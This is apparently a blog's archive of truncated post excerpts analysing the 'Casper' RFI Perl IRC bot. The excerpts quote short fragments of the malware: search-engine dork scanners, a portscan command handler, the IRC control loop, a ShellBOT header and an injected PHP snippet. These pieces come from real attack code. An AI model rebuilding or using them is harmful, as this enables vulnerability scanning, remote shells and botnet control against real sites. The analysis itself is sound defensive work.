September 26, 2010 12:50 AM
Posted by: Dan O'Connor
casper bot,
casper rfi perl bot,
perl bot,
www perl bot
What this appears to be looking for is more machines to exploit, big surprise!
I followed it back for a bit and this is what I ended up with.
sub se_yahoo {
my ($chan,$key,$nf) = @_;
sub s_engine {
my ($f,$se,$type,$chan,$bug,$dork,$ef) = @_;
sub s_cari {
#Type: 1 = Cari...
September 26, 2010 12:23 AM
Posted by: Dan O'Connor
casper bot,
casper rfi perl bot,
perl bot,
www perl bot
One more script listed at the top of the main one.
$filebotscan = "scan.txt";
It's full of all sorts of stuff; nothing really caught my attention until I reached this.
##[ GOOGLE ]##
sub se_google {
my ($chan,$key,$nf) = @_;
my @daftar;
my $num = 50; my $max = 5000; my...
September 25, 2010 9:21 PM
Posted by: Dan O'Connor
casper bot,
casper rfi perl bot,
perl bot,
www perl bot
There are a few more things that are worth looking at.
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my...
September 16, 2010 10:05 PM
Posted by: Dan O'Connor
casper bot,
casper rfi perl bot,
perl bot,
www perl bot
So what is going on next,
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
&DCC::connections;
my @ready = $sel_cliente->can_read(0.6);
next...
September 15, 2010 10:14 AM
Posted by: Dan O'Connor
casper bot,
casper rfi perl bot,
perl bot,
www perl bot
OK, we have a couple more to go through.
Next is:
$filebotperl = "iso.txt";
I love comments, at least we don't have to guess what this is for.
#!/usr/bin/perl
#
# ShellBOT by: devil__
# Greetz: Puna, Kelserific
# Comandos:
# @oldpack <ip>...
September 9, 2010 9:10 AM
Posted by: Dan O'Connor
casper bot,
casper rfi perl bot,
perl bot,
www perl bot
The next on the list is
$filebotphp = "bot.txt";
This looks pretty specific to the IRC bot, but there is something encoded again just like in the other scripts.
$dc_source =...
August 27, 2010 1:14 PM
Posted by: Dan O'Connor
casper bot,
casper rfi perl bot,
perl bot,
www perl bot
So it looks like sh.txt is all about shell access, wow what a surprise!
The next item is def.txt. There is not a whole lot in there besides the defacement message, so we are going to move on.
The next item is a tar.gz, psy.tar.gz. Let's unpack it and look around.
It's from a project...
August 27, 2010 11:59 AM
Posted by: Dan O'Connor
casper bot,
casper rfi perl bot,
perl bot,
www perl bot
We have one more to decode, $shell_data
$shell_data = "$visitcount = $HTTP_COOKIE_VARS["visits"];
if( $visitcount == "") {
$visitcount = 0;
$visitor = $_SERVER["REMOTE_ADDR"];
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$target =...
August 27, 2010 8:48 AM
Posted by: Dan O'Connor
casper bot,
casper rfi perl bot,
perl bot,
www perl bot
At first I was thinking that these might be encrypted, but that did not turn out to be the case.
The first one we found was...